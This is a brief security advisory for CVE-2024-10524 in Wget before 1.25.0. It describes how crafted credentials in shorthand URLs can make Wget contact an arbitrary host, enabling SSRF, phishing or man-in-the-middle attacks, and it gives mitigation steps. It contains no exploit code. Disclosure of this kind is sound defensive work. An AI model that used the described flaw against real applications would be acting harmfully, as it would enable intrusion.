Wget · Wget · CVE-2024-10524
Name of the Vulnerable Software and Affected Versions:
Wget versions prior to 1.25.0
Description:
The issue is related to insufficient validation of requests on the server side, allowing attackers to exploit Wget's shorthand URL handling. This can lead to Server-Side Request Forgery (SSRF) attacks, phishing attacks, or Man-in-the-Middle (MiTM) attacks. Applications that use Wget to access remote resources using shorthand URLs and pass arbitrary user credentials in the URL are vulnerable. Attackers can enter crafted credentials, causing Wget to access an arbitrary host.
Recommendations:
For versions prior to 1.25.0, update to Wget 1.25.0 or later to mitigate the risk.
As a temporary workaround, consider sanitizing inputs and avoiding the use of shorthand URLs.
Restrict access to vulnerable modules or functions to minimize the risk of exploitation.